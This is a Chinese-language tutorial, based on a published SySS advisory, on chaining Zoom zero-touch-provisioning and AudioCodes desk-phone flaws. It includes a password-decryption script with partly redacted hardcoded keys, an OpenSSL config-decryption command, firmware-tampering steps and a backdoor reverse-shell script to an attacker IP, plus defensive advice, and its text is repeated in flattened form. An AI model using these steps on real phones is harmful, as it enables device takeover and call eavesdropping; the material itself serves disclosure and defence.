Zoom零接触配置(ZTP)安全漏洞分析与利用教学文档

1. 概述

本文档详细分析Zoom零接触配置(ZTP)服务与AudioCodes桌面电话中存在的安全漏洞，并提供完整的漏洞利用教学。这些漏洞可组合使用，实现远程控制设备、窃听通话、构建僵尸网络等攻击。

2. 关键漏洞总结

产品	漏洞类型	SySS ID	CVE ID
AudioCodes IP-Phones (UC)	使用硬编码的加密密钥	SYSS-2022-052	CVE-2023-22957
AudioCodes Provisioning Service	敏感信息暴露	SYSS-2022-053	N.A.
AudioCodes IP-Phones (UC)	使用硬编码的加密密钥	SYSS-2022-054	CVE-2023-22956
AudioCodes IP-Phones (UC)	硬件中缺少不可变的可信根	SYSS-2022-055	CVE-2023-22955
Zoom Phone System Management	未经核实的所有权	SYSS-2022-056	N.A.

3. Zoom ZTP工作流程分析

3.1 标准工作流程

管理员在Zoom Phone管理界面添加新设备并分配配置模板
厂商重定向服务被激活并被告知设备已分配给Zoom
出厂设置的设备向厂商重定向服务请求配置
重定向服务将请求转发至Zoom ZTP服务
桌面电话向Zoom ZTP服务请求设备配置
ZTP服务响应分配的配置模板

3.2 认证机制

基于客户端证书的双向TLS认证
User-Agent请求头验证
客户端证书CN属性必须匹配设备MAC地址或序列号

4. AudioCodes设备分析

4.1 重定向服务漏洞

访问redirect.audiocodes.com无需认证
URL中可能包含敏感信息
可扫描整个MAC地址范围获取配置信息

4.2 密码解密

发现Base64编码的加密密码
分析/lib/libaq201.so和/lib/libac_des3.so库
逆向decrypt_string函数
提取硬编码的Triple DES密钥和IV
使用Python脚本解密密码

解密脚本示例：

#!/usr/bin/env python3
import sys
import base64
from Crypto.Cipher import DES3
from binascii import unhexlify

KEY = unhexlify('604075fb...') 
IV = unhexlify('a3a4...35cb...')

def decrypt(ciphertext):
    ciphertext_decoded = base64.b64decode(ciphertext)
    cipher = DES3.new(KEY, DES3.MODE_CBC, iv=IV)
    plaintext = cipher.decrypt(ciphertext_decoded)
    print(f"plain text password: {plaintext.decode('utf-8')}")

if __name__ == '__main__':
    decrypt(sys.argv[1])

4.3 配置文件解密

分析/lib/libcgi.so和decryption_tool可执行文件
发现使用EVP_des_ede3_cbc算法
提取硬编码的密钥派生字符串
使用OpenSSL解密配置文件

解密命令：

openssl enc -d -des-ede3-cbc -pass pass:$secret -nosalt \
-in encrypted_config.cfx -out plain_config.cfg

4.4 固件映像分析

下载官方固件并分析结构
发现固件包含多个区域和简单校验和
修改固件内容并重新计算校验和
成功安装修改后的固件映像

固件结构：

固件头部(元信息)
bootloader.img
rootfs.ext4
phone.img
section.map
flasher
release
end.section

5. 攻击链构建

5.1 攻击步骤

将目标设备MAC地址添加到攻击者Zoom账户
分配包含恶意配置的模板(指向攻击者控制的固件)
目标设备恢复出厂设置
设备通过ZTP下载并安装恶意固件
获取设备root权限shell

5.2 恶意固件修改

提取rootfs.ext4文件系统
添加后门脚本(如反向shell)
修改启动脚本(/home/ipphone/rcS)
重新打包固件并计算校验和

示例后门脚本：

#!/bin/sh
/bin/sleep 120
TF=$(/bin/mktemp -u)
/usr/bin/mkfifo $TF
/usr/bin/telnet <ATTACKER-IP> 5000 0<$TF | /bin/sh 1>$TF

6. 防御建议

实施强认证机制验证设备所有权
避免使用硬编码加密密钥
实现固件签名验证机制
保护重定向服务中的敏感信息
限制可添加设备的MAC地址范围
实施固件完整性检查

7. 总结

通过组合利用Zoom ZTP服务和AudioCodes设备中的多个漏洞，攻击者可实现远程设备控制。这凸显了云服务与传统硬件集成时的安全风险，建议厂商和用户采取适当防护措施。

Zoom零接触配置(ZTP)安全漏洞分析与利用教学文档 1. 概述本文档详细分析Zoom零接触配置(ZTP)服务与AudioCodes桌面电话中存在的安全漏洞，并提供完整的漏洞利用教学。这些漏洞可组合使用，实现远程控制设备、窃听通话、构建僵尸网络等攻击。 2. 关键漏洞总结 | 产品 | 漏洞类型 | SySS ID | CVE ID | |------|----------|---------|--------| | AudioCodes IP-Phones (UC) | 使用硬编码的加密密钥 | SYSS-2022-052 | CVE-2023-22957 | | AudioCodes Provisioning Service | 敏感信息暴露 | SYSS-2022-053 | N.A. | | AudioCodes IP-Phones (UC) | 使用硬编码的加密密钥 | SYSS-2022-054 | CVE-2023-22956 | | AudioCodes IP-Phones (UC) | 硬件中缺少不可变的可信根 | SYSS-2022-055 | CVE-2023-22955 | | Zoom Phone System Management | 未经核实的所有权 | SYSS-2022-056 | N.A. | 3. Zoom ZTP工作流程分析 3.1 标准工作流程管理员在Zoom Phone管理界面添加新设备并分配配置模板厂商重定向服务被激活并被告知设备已分配给Zoom 出厂设置的设备向厂商重定向服务请求配置重定向服务将请求转发至Zoom ZTP服务桌面电话向Zoom ZTP服务请求设备配置 ZTP服务响应分配的配置模板 3.2 认证机制基于客户端证书的双向TLS认证 User-Agent请求头验证客户端证书CN属性必须匹配设备MAC地址或序列号 4. AudioCodes设备分析 4.1 重定向服务漏洞访问redirect.audiocodes.com无需认证 URL中可能包含敏感信息可扫描整个MAC地址范围获取配置信息 4.2 密码解密发现Base64编码的加密密码分析/lib/libaq201.so和/lib/libac_ des3.so库逆向decrypt_ string函数提取硬编码的Triple DES密钥和IV 使用Python脚本解密密码解密脚本示例： 4.3 配置文件解密分析/lib/libcgi.so和decryption_ tool可执行文件发现使用EVP_ des_ ede3_ cbc算法提取硬编码的密钥派生字符串使用OpenSSL解密配置文件解密命令： 4.4 固件映像分析下载官方固件并分析结构发现固件包含多个区域和简单校验和修改固件内容并重新计算校验和成功安装修改后的固件映像固件结构：固件头部(元信息) bootloader.img rootfs.ext4 phone.img section.map flasher release end.section 5. 攻击链构建 5.1 攻击步骤将目标设备MAC地址添加到攻击者Zoom账户分配包含恶意配置的模板(指向攻击者控制的固件) 目标设备恢复出厂设置设备通过ZTP下载并安装恶意固件获取设备root权限shell 5.2 恶意固件修改提取rootfs.ext4文件系统添加后门脚本(如反向shell) 修改启动脚本(/home/ipphone/rcS) 重新打包固件并计算校验和示例后门脚本： 6. 防御建议实施强认证机制验证设备所有权避免使用硬编码加密密钥实现固件签名验证机制保护重定向服务中的敏感信息限制可添加设备的MAC地址范围实施固件完整性检查 7. 总结通过组合利用Zoom ZTP服务和AudioCodes设备中的多个漏洞，攻击者可实现远程设备控制。这凸显了云服务与传统硬件集成时的安全风险，建议厂商和用户采取适当防护措施。